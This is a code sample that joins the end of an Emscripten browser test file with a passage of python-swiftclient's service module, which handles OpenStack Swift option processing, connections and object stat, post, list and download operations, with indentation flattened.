cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page2.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module2', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage2["asm"]']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
# Tests that it is possible to encapsulate asm.js compiled programs by using --separate-asm + MODULARIZE=1. See
# encapsulated_asmjs_page_load.html for the example.
@no_wasm_backend('this tests asm.js support')
def test_encapsulated_asmjs_page_load(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'encapsulated_asmjs_page_load.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'a.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=EmscriptenCode', '-s', 'SEPARATE_ASM_MODULE_NAME="var EmscriptenCode"']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME=1'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1']]:
for modularize in [[], ['-s', 'MODULARIZE=1']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
@requires_threads
@no_fastcomp('offset converter is not supported on fastcomp')
def test_offset_converter(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
|
service.py
|
# Copyright (c) 2010-2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import logging
import os
from collections import defaultdict
from concurrent.futures import as_completed, CancelledError, TimeoutError
from copy import deepcopy
from errno import EEXIST, ENOENT
from hashlib import md5
from os import environ, makedirs, stat, utime
from os.path import (
basename, dirname, getmtime, getsize, isdir, join, sep as os_path_sep
)
from posixpath import join as urljoin
from random import shuffle
from time import time
from threading import Thread
from six import Iterator, StringIO, string_types, text_type
from six.moves.queue import Queue
from six.moves.queue import Empty as QueueEmpty
from six.moves.urllib.parse import quote
import json
from swiftclient import Connection
from swiftclient.command_helpers import (
stat_account, stat_container, stat_object
)
from swiftclient.utils import (
config_true_value, ReadableToIterable, LengthWrapper, EMPTY_ETAG,
parse_api_response, report_traceback, n_groups, split_request_headers,
n_at_a_time, normalize_manifest_path
)
from swiftclient.exceptions import ClientException
from swiftclient.multithreading import MultiThreadingManager
DISK_BUFFER = 2 ** 16
logger = logging.getLogger("swiftclient.service")
class ResultsIterator(Iterator):
def __init__(self, futures):
self.futures = interruptable_as_completed(futures)
def __iter__(self):
return self
def __next__(self):
next_completed_future = next(self.futures)
return next_completed_future.result()
class SwiftError(Exception):
def __init__(self, value, container=None, obj=None,
segment=None, exc=None):
self.value = value
self.container = container
self.obj = obj
self.segment = segment
self.exception = exc
def __str__(self):
value = repr(self.value)
if self.container is not None:
value += " container:%s" % self.container
if self.obj is not None:
value += " object:%s" % self.obj
if self.segment is not None:
value += " segment:%s" % self.segment
return value
def __repr__(self):
return str(self)
def process_options(options):
# tolerate sloppy auth_version
if options.get('auth_version') == '3.0':
options['auth_version'] = '3'
elif options.get('auth_version') == '2':
options['auth_version'] = '2.0'
if options.get('auth_version') not in ('2.0', '3') and not all(
options.get(key) for key in ('auth', 'user', 'key')):
# Use keystone auth if any of the new-style args are present
if any(options.get(k) for k in (
'os_user_domain_id',
'os_user_domain_name',
'os_project_domain_id',
'os_project_domain_name')):
# Use v3 if there's any reference to domains
options['auth_version'] = '3'
else:
options['auth_version'] = '2.0'
if options.get('os_auth_type', None) == 'v3applicationcredential':
        options['auth_version'] = '3'
# Use new-style args if old ones not present
if not options['auth'] and options['os_auth_url']:
options['auth'] = options['os_auth_url']
if not options['user'] and options['os_username']:
options['user'] = options['os_username']
if not options['key'] and options['os_password']:
options['key'] = options['os_password']
# Specific OpenStack options
options['os_options'] = {
'user_id': options['os_user_id'],
'user_domain_id': options['os_user_domain_id'],
'user_domain_name': options['os_user_domain_name'],
'tenant_id': options['os_tenant_id'],
'tenant_name': options['os_tenant_name'],
'project_id': options['os_project_id'],
'project_name': options['os_project_name'],
'project_domain_id': options['os_project_domain_id'],
'project_domain_name': options['os_project_domain_name'],
'service_type': options['os_service_type'],
'endpoint_type': options['os_endpoint_type'],
'auth_token': options['os_auth_token'],
'object_storage_url': options['os_storage_url'],
'region_name': options['os_region_name'],
'auth_type': options['os_auth_type'],
'application_credential_id':
options['os_application_credential_id'],
'application_credential_secret':
options['os_application_credential_secret'],
}
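# Illustrative sketch of what process_options() does to a fresh options dict
# (values below are hypothetical and assume the ST_*/OS_* environment
# variables are unset):
#
#     opts = dict(_default_global_options, **_default_local_options)
#     opts['os_user_domain_name'] = 'Default'   # any domain reference
#     process_options(opts)
#     # With no v1-style auth/user/key configured, the domain reference
#     # selects keystone v3, and the os_* settings are collected into
#     # opts['os_options'] ready for get_conn()/Connection.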
def _build_default_global_options():
return {
"snet": False,
"verbose": 1,
"debug": False,
"info": False,
"auth": environ.get('ST_AUTH'),
"auth_version": environ.get('ST_AUTH_VERSION', '1.0'),
"user": environ.get('ST_USER'),
"key": environ.get('ST_KEY'),
"retries": 5,
"force_auth_retry": False,
"os_username": environ.get('OS_USERNAME'),
"os_user_id": environ.get('OS_USER_ID'),
"os_user_domain_name": environ.get('OS_USER_DOMAIN_NAME'),
"os_user_domain_id": environ.get('OS_USER_DOMAIN_ID'),
"os_password": environ.get('OS_PASSWORD'),
"os_tenant_id": environ.get('OS_TENANT_ID'),
"os_tenant_name": environ.get('OS_TENANT_NAME'),
"os_project_name": environ.get('OS_PROJECT_NAME'),
"os_project_id": environ.get('OS_PROJECT_ID'),
"os_project_domain_name": environ.get('OS_PROJECT_DOMAIN_NAME'),
"os_project_domain_id": environ.get('OS_PROJECT_DOMAIN_ID'),
"os_auth_url": environ.get('OS_AUTH_URL'),
"os_auth_token": environ.get('OS_AUTH_TOKEN'),
"os_auth_type": environ.get('OS_AUTH_TYPE'),
"os_application_credential_id":
environ.get('OS_APPLICATION_CREDENTIAL_ID'),
"os_application_credential_secret":
environ.get('OS_APPLICATION_CREDENTIAL_SECRET'),
"os_storage_url": environ.get('OS_STORAGE_URL'),
"os_region_name": environ.get('OS_REGION_NAME'),
"os_service_type": environ.get('OS_SERVICE_TYPE'),
"os_endpoint_type": environ.get('OS_ENDPOINT_TYPE'),
"os_cacert": environ.get('OS_CACERT'),
"os_cert": environ.get('OS_CERT'),
"os_key": environ.get('OS_KEY'),
"insecure": config_true_value(environ.get('SWIFTCLIENT_INSECURE')),
"ssl_compression": False,
'segment_threads': 10,
'object_dd_threads': 10,
'object_uu_threads': 10,
'container_threads': 10
}
_default_global_options = _build_default_global_options()
_default_local_options = {
'sync_to': None,
'sync_key': None,
'use_slo': False,
'segment_size': None,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'version_id': None,
'yes_all': False,
'read_acl': None,
'write_acl': None,
'out_file': None,
'out_directory': None,
'remove_prefix': False,
'no_download': False,
'long': False,
'totals': False,
'marker': '',
'header': [],
'meta': [],
'prefix': None,
'delimiter': None,
'versions': False,
'fail_fast': False,
'human': False,
'dir_marker': False,
'checksum': True,
'shuffle': False,
'destination': None,
'fresh_metadata': False,
'ignore_mtime': False,
}
POLICY = 'X-Storage-Policy'
KNOWN_DIR_MARKERS = (
'application/directory', # Preferred
'text/directory', # Historically relevant
)
def get_from_queue(q, timeout=864000):
while True:
try:
item = q.get(timeout=timeout)
return item
except QueueEmpty:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_future_result(f, timeout=86400):
while True:
try:
res = f.result(timeout=timeout)
return res
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def interruptable_as_completed(fs, timeout=86400):
while True:
try:
for f in as_completed(fs, timeout=timeout):
fs.remove(f)
yield f
return
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
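# Illustrative sketch of why the wrappers above poll with a long timeout:
# blocking forever can swallow KeyboardInterrupt on some Python versions, so
# each wait is chunked and simply retried. Hypothetical usage with a plain
# executor (not part of this module):
#
#     from concurrent.futures import ThreadPoolExecutor
#     pool = ThreadPoolExecutor(max_workers=4)
#     futures = [pool.submit(pow, 2, n) for n in range(8)]
#     for f in interruptable_as_completed(futures):
#         print(f.result())
#     pool.shutdown()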
def get_conn(options):
"""
Return a connection building it from the options.
"""
return Connection(options['auth'],
options['user'],
options['key'],
retries=options['retries'],
auth_version=options['auth_version'],
os_options=options['os_options'],
snet=options['snet'],
cacert=options['os_cacert'],
insecure=options['insecure'],
cert=options['os_cert'],
cert_key=options['os_key'],
ssl_compression=options['ssl_compression'],
force_auth_retry=options['force_auth_retry'],
starting_backoff=options.get('starting_backoff', 1),
max_backoff=options.get('max_backoff', 64))
def mkdirs(path):
try:
makedirs(path)
except OSError as err:
if err.errno != EEXIST:
raise
def split_headers(options, prefix=''):
"""
Splits 'Key: Value' strings and returns them as a dictionary.
:param options: Must be one of:
* an iterable of 'Key: Value' strings
* an iterable of ('Key', 'Value') pairs
* a dict of {'Key': 'Value'} pairs
:param prefix: String to prepend to all of the keys in the dictionary.
"""
headers = {}
try:
headers = split_request_headers(options, prefix)
except ValueError as e:
raise SwiftError(e)
return headers
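# Illustrative example of split_headers() (header values are made up):
#
#     split_headers(['X-Delete-After: 60'])
#     # -> roughly {'X-Delete-After': '60'}
#     split_headers(['Color: blue'], prefix='X-Object-Meta-')
#     # -> roughly {'X-Object-Meta-Color': 'blue'}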
class SwiftUploadObject(object):
"""
Class for specifying an object upload, allowing the object source, name and
options to be specified separately for each individual object.
"""
def __init__(self, source, object_name=None, options=None):
if isinstance(source, string_types):
self.object_name = object_name or source
elif source is None or hasattr(source, 'read'):
if not object_name or not isinstance(object_name, string_types):
raise SwiftError('Object names must be specified as '
'strings for uploads from None or file '
'like objects.')
self.object_name = object_name
else:
raise SwiftError('Unexpected source type for '
'SwiftUploadObject: {0}'.format(type(source)))
if not self.object_name:
raise SwiftError('Object names must not be empty strings')
self.object_name = self.object_name.lstrip('/')
self.options = options
self.source = source
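    # Illustrative ways to construct an upload (paths and names hypothetical):
    #
    #     SwiftUploadObject('/tmp/report.csv')            # name taken from the path (leading '/' stripped)
    #     SwiftUploadObject('/tmp/report.csv', object_name='reports/2020.csv')
    #     SwiftUploadObject(None, object_name='placeholder')   # empty object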
class SwiftPostObject(object):
"""
Class for specifying an object post, allowing the headers/metadata to be
specified separately for each individual object.
"""
def __init__(self, object_name, options=None):
if not (isinstance(object_name, string_types) and object_name):
raise SwiftError(
"Object names must be specified as non-empty strings"
)
self.object_name = object_name
self.options = options
class SwiftDeleteObject(object):
"""
Class for specifying an object delete, allowing the headers/metadata to be
specified separately for each individual object.
"""
def __init__(self, object_name, options=None):
if not (isinstance(object_name, string_types) and object_name):
raise SwiftError(
"Object names must be specified as non-empty strings"
)
self.object_name = object_name
self.options = options
class SwiftCopyObject(object):
"""
Class for specifying an object copy,
allowing the destination/headers/metadata/fresh_metadata to be specified
separately for each individual object.
destination and fresh_metadata should be set in options
"""
def __init__(self, object_name, options=None):
if not (isinstance(object_name, string_types) and object_name):
raise SwiftError(
"Object names must be specified as non-empty strings"
)
self.object_name = object_name
self.options = options
if self.options is None:
self.destination = None
self.fresh_metadata = False
else:
self.destination = self.options.get('destination')
self.fresh_metadata = self.options.get('fresh_metadata', False)
if self.destination is not None:
destination_components = self.destination.split('/')
if destination_components[0] or len(destination_components) < 2:
raise SwiftError("destination must be in format /cont[/obj]")
if not destination_components[-1]:
raise SwiftError("destination must not end in a slash")
if len(destination_components) == 2:
# only container set in destination
self.destination = "{0}/{1}".format(
self.destination, object_name
)
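    # Illustrative destination handling (container and object names made up):
    #
    #     SwiftCopyObject('a.txt', {'destination': '/backup'}).destination
    #     # -> '/backup/a.txt'  (container only, so the object name is appended)
    #     SwiftCopyObject('a.txt', {'destination': '/backup/copy.txt'}).destination
    #     # -> '/backup/copy.txt'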
class _SwiftReader(object):
"""
Class for downloading objects from swift and raising appropriate
    errors on failures caused by either an invalid md5sum or an unexpected
    size of the data read.
"""
def __init__(self, path, body, headers, checksum=True):
self._path = path
self._body = body
self._actual_read = 0
self._content_length = None
self._actual_md5 = None
self._expected_md5 = headers.get('etag', '')
if len(self._expected_md5) > 1 and self._expected_md5[0] == '"' \
and self._expected_md5[-1] == '"':
self._expected_md5 = self._expected_md5[1:-1]
# Some headers indicate the MD5 of the response
# definitely *won't* match the ETag
bad_md5_headers = set([
'content-range',
'x-object-manifest',
'x-static-large-object',
])
if bad_md5_headers.intersection(headers):
# This isn't a useful checksum
self._expected_md5 = ''
if self._expected_md5 and checksum:
self._actual_md5 = md5()
if 'content-length' in headers:
try:
self._content_length = int(headers.get('content-length'))
except ValueError:
raise SwiftError('content-length header must be an integer')
def __iter__(self):
for chunk in self._body:
if self._actual_md5:
self._actual_md5.update(chunk)
self._actual_read += len(chunk)
yield chunk
self._check_contents()
def _check_contents(self):
if self._actual_md5 and self._expected_md5:
etag = self._actual_md5.hexdigest()
if etag != self._expected_md5:
raise SwiftError('Error downloading {0}: md5sum != etag, '
'{1} != {2}'.format(
self._path, etag, self._expected_md5))
if (self._content_length is not None and
self._actual_read != self._content_length):
raise SwiftError('Error downloading {0}: read_length != '
'content_length, {1:d} != {2:d}'.format(
self._path, self._actual_read,
self._content_length))
def bytes_read(self):
return self._actual_read
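    # Illustrative sketch of how the reader is used (path, body and headers
    # are made up): iterating streams the chunks while the MD5/length
    # bookkeeping accumulates, and the final consistency check runs once the
    # body is exhausted.
    #
    #     reader = _SwiftReader('c/o', iter([b'abc']), {'content-length': '3'})
    #     data = b''.join(reader)        # would raise SwiftError on a mismatch
    #     assert reader.bytes_read() == 3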
class SwiftService(object):
"""
Service for performing swift operations
"""
def __init__(self, options=None):
if options is not None:
self._options = dict(
_default_global_options,
**dict(_default_local_options, **options)
)
else:
self._options = dict(
_default_global_options,
**_default_local_options
)
process_options(self._options)
def create_connection():
return get_conn(self._options)
self.thread_manager = MultiThreadingManager(
create_connection,
segment_threads=self._options['segment_threads'],
object_dd_threads=self._options['object_dd_threads'],
object_uu_threads=self._options['object_uu_threads'],
container_threads=self._options['container_threads']
)
self.capabilities_cache = {} # Each instance should have its own cache
def __enter__(self):
self.thread_manager.__enter__()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.thread_manager.__exit__(exc_type, exc_val, exc_tb)
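    # Illustrative use of the service as a context manager (container name is
    # hypothetical; credentials come from the ST_*/OS_* environment or an
    # explicit options dict):
    #
    #     with SwiftService() as swift:
    #         info = swift.stat(container='photos')
    #         if info['success']:
    #             print(info['headers'].get('x-container-object-count'))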
# Stat related methods
#
def stat(self, container=None, objects=None, options=None):
"""
Get account stats, container stats or information about a list of
objects in a container.
:param container: The container to query.
:param objects: A list of object paths about which to return
information (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all stat operations
performed by this call::
{
'human': False,
'version_id': None,
'header': []
}
:returns: Either a single dictionary containing stats about an account
or container, or an iterator for returning the results of the
stat operations on a list of objects.
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
if objects:
raise SwiftError('Objects specified without container')
else:
res = {
'action': 'stat_account',
'success': True,
'container': container,
'object': None,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_account, options
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
if not objects:
res = {
'action': 'stat_container',
'container': container,
'object': None,
'success': True,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_container, options, container
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Container %r not found' % container,
container=container, exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
stat_futures = []
for stat_o in objects:
stat_future = self.thread_manager.object_dd_pool.submit(
self._stat_object, container, stat_o, options
)
stat_futures.append(stat_future)
return ResultsIterator(stat_futures)
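    # Illustrative sketch of statting a list of objects (names hypothetical);
    # per-object results are yielded by the ResultsIterator as they complete:
    #
    #     with SwiftService() as swift:
    #         for res in swift.stat(container='photos', objects=['a.jpg', 'b.jpg']):
    #             print(res['object'], res['success'])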
@staticmethod
def _stat_object(conn, container, obj, options):
res = {
'action': 'stat_object',
'object': obj,
'container': container,
'success': True,
}
try:
items, headers = stat_object(conn, options, container, obj)
res.update({
'items': items,
'headers': headers
})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Post related methods
#
def post(self, container=None, objects=None, options=None):
"""
Post operations on an account, container or list of objects
:param container: The container to make the post operation against.
:param objects: A list of object names (strings) or SwiftPostObject
instances containing an object name, and an
options dict (can be None) to override the options for
that individual post operation::
[
'object_name',
SwiftPostObject('object_name', options={...}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all post operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'read_acl': None, # For containers only
'write_acl': None, # For containers only
'sync_to': None, # For containers only
'sync_key': None # For containers only
}
:returns: Either a single result dictionary in the case of a post to a
container/account, or an iterator for returning the results
of posts to a list of objects.
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
res = {
'success': True,
'container': container,
'object': None,
'headers': {},
}
if not container:
res["action"] = "post_account"
if objects:
raise SwiftError('Objects specified without container')
else:
response_dict = {}
headers = split_headers(
options['meta'], 'X-Account-Meta-')
headers.update(
split_headers(options['header'], ''))
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_account_job, headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
if not objects:
res["action"] = "post_container"
response_dict = {}
headers = split_headers(
options['meta'], 'X-Container-Meta-')
headers.update(
split_headers(options['header'], ''))
if options['read_acl'] is not None:
headers['X-Container-Read'] = options['read_acl']
if options['write_acl'] is not None:
headers['X-Container-Write'] = options['write_acl']
if options['sync_to'] is not None:
headers['X-Container-Sync-To'] = options['sync_to']
if options['sync_key'] is not None:
headers['X-Container-Sync-Key'] = options['sync_key']
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_container_job, container,
headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError(
"Container '%s' not found" % container,
container=container, exc=err
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
post_futures = []
post_objects = self._make_post_objects(objects)
for post_object in post_objects:
obj = post_object.object_name
obj_options = post_object.options
response_dict = {}
headers = split_headers(
options['meta'], 'X-Object-Meta-')
# add header options to the headers object for the request.
headers.update(
split_headers(options['header'], ''))
if obj_options is not None:
if 'meta' in obj_options:
headers.update(
split_headers(
obj_options['meta'], 'X-Object-Meta-'
)
)
if 'header' in obj_options:
headers.update(
split_headers(obj_options['header'], '')
)
post = self.thread_manager.object_uu_pool.submit(
self._post_object_job, container, obj,
headers, response_dict
)
post_futures.append(post)
return ResultsIterator(post_futures)
@staticmethod
def _make_post_objects(objects):
post_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftPostObject(o)
post_objects.append(obj)
elif isinstance(o, SwiftPostObject):
post_objects.append(o)
else:
raise SwiftError(
"The post operation takes only strings or "
"SwiftPostObjects as input",
obj=o)
return post_objects
@staticmethod
def _post_account_job(conn, headers, result):
return conn.post_account(headers=headers, response_dict=result)
@staticmethod
def _post_container_job(conn, container, headers, result):
try:
res = conn.post_container(
container, headers=headers, response_dict=result)
except ClientException as err:
if err.http_status != 404:
raise
_response_dict = {}
res = conn.put_container(
container, headers=headers, response_dict=_response_dict)
result['post_put'] = _response_dict
return res
@staticmethod
def _post_object_job(conn, container, obj, headers, result):
res = {
'success': True,
'action': 'post_object',
'container': container,
'object': obj,
'headers': headers,
'response_dict': result
}
try:
conn.post_object(
container, obj, headers=headers, response_dict=result)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# List related methods
#
def list(self, container=None, options=None):
"""
List operations on an account, container.
:param container: The container to make the list operation against.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'long': False,
'prefix': None,
'delimiter': None,
'versions': False,
'header': []
}
:returns: A generator for returning the results of the list operation
on an account or container. Each result yielded from the
generator is either a 'list_account_part' or
'list_container_part', containing part of the listing.
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
        rq = Queue(maxsize=10)  # Just stop the listing from running away and consuming memory
if container is None:
listing_future = self.thread_manager.container_pool.submit(
self._list_account_job, options, rq
)
else:
listing_future = self.thread_manager.container_pool.submit(
self._list_container_job, container, options, rq
)
res = get_from_queue(rq)
while res is not None:
yield res
res = get_from_queue(rq)
# Make sure the future has completed
get_future_result(listing_future)
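    # Illustrative sketch of consuming the listing generator (container name
    # hypothetical); each yielded part carries one page of the listing:
    #
    #     with SwiftService() as swift:
    #         for page in swift.list(container='photos'):
    #             if not page['success']:
    #                 raise page['error']
    #             for item in page['listing']:
    #                 print(item['name'])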
@staticmethod
def _list_account_job(conn, options, result_queue):
marker = ''
error = None
req_headers = split_headers(options.get('header', []))
try:
while True:
_, items = conn.get_account(
marker=marker, prefix=options['prefix'],
headers=req_headers
)
if not items:
result_queue.put(None)
return
if options['long']:
for i in items:
name = i['name']
i['meta'] = conn.head_container(name)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': True,
'listing': items,
'marker': marker,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
except ClientException as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.http_status != 404:
error = (err, traceback, err_time)
else:
error = (
SwiftError('Account not found', exc=err),
traceback, err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
@staticmethod
def _list_container_job(conn, container, options, result_queue):
marker = options.get('marker', '')
version_marker = options.get('version_marker', '')
error = None
req_headers = split_headers(options.get('header', []))
if options.get('versions', False):
query_string = 'versions=true'
else:
query_string = None
try:
while True:
_, items = conn.get_container(
container, marker=marker, version_marker=version_marker,
prefix=options['prefix'], delimiter=options['delimiter'],
headers=req_headers, query_string=query_string
)
if not items:
result_queue.put(None)
return
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': True,
'marker': marker,
'listing': items,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
version_marker = items[-1].get('version_id', '')
except ClientException as err:
traceback, err_time = report_traceback()
if err.http_status != 404:
logger.exception(err)
error = (err, traceback, err_time)
else:
error = (
SwiftError(
'Container %r not found' % container,
container=container, exc=err
),
traceback,
err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'version_marker': version_marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
# Download related methods
#
def download(self, container=None, objects=None, options=None):
"""
Download operations on an account, optional container and optional list
of objects.
:param container: The container to download from.
:param objects: A list of object names to download (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'marker': '',
'prefix': None,
'no_download': False,
'header': [],
'skip_identical': False,
'version_id': None,
'out_directory': None,
'checksum': True,
'out_file': None,
'remove_prefix': False,
'shuffle' : False
}
:returns: A generator for returning the results of the download
operations. Each result yielded from the generator is a
'download_object' dictionary containing the results of an
individual file download.
:raises ClientException:
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
# Download everything if options['yes_all'] is set
if options['yes_all']:
try:
options_copy = deepcopy(options)
options_copy["long"] = False
for part in self.list(options=options_copy):
if part["success"]:
containers = [i['name'] for i in part["listing"]]
if options['shuffle']:
shuffle(containers)
for con in containers:
for res in self._download_container(
con, options_copy):
yield res
else:
raise part["error"]
# If we see a 404 here, the listing of the account failed
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError('Account not found', exc=err)
elif objects is None:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
for res in self._download_container(container, options):
yield res
else:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
if options['out_file'] and len(objects) > 1:
options['out_file'] = None
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
for o_down in interruptable_as_completed(o_downs):
yield o_down.result()
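    # Illustrative sketch of downloading a whole container (names and the
    # output directory are hypothetical):
    #
    #     with SwiftService(options={'out_directory': 'backup'}) as swift:
    #         for res in swift.download(container='photos'):
    #             if not res['success']:
    #                 print('failed: %s' % res['object'])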
def _download_object_job(self, conn, container, obj, options):
out_file = options['out_file']
results_dict = {}
req_headers = split_headers(options['header'], '')
pseudodir = False
path = join(container, obj) if options['yes_all'] else obj
path = path.lstrip(os_path_sep)
options['skip_identical'] = (options['skip_identical'] and
out_file != '-')
if options['prefix'] and options['remove_prefix']:
path = path[len(options['prefix']):].lstrip('/')
if options['out_directory']:
path = os.path.join(options['out_directory'], path)
if options['skip_identical']:
filename = out_file if out_file else path
try:
fp = open(filename, 'rb', DISK_BUFFER)
except IOError:
pass
else:
with fp:
md5sum = md5()
while True:
data = fp.read(DISK_BUFFER)
if not data:
break
md5sum.update(data)
req_headers['If-None-Match'] = md5sum.hexdigest()
try:
start_time = time()
get_args = {'resp_chunk_size': DISK_BUFFER,
'headers': req_headers,
'response_dict': results_dict}
if options.get('version_id') is not None:
get_args['query_string'] = (
'version-id=%s' % options['version_id'])
if options['skip_identical']:
# Assume the file is a large object; if we're wrong, the query
# string is ignored and the If-None-Match header will trigger
# the behavior we want
get_args['query_string'] = 'multipart-manifest=get'
try:
headers, body = conn.get_object(container, obj, **get_args)
except ClientException as e:
if not options['skip_identical']:
raise
if e.http_status != 304: # Only handling Not Modified
raise
headers = results_dict['headers']
if 'x-object-manifest' in headers:
# DLO: most likely it has more than one page worth of
# segments and we have an empty file locally
body = []
elif config_true_value(headers.get('x-static-large-object')):
# SLO: apparently we have a copy of the manifest locally?
# provide no chunking data to force a fresh download
body = [b'[]']
else:
# Normal object: let it bubble up
raise
if options['skip_identical']:
if config_true_value(headers.get('x-static-large-object')) or \
'x-object-manifest' in headers:
# The request was chunked, so stitch it back together
chunk_data = self._get_chunk_data(conn, container, obj,
headers, b''.join(body))
else:
chunk_data = None
if chunk_data is not None:
if self._is_identical(chunk_data, filename):
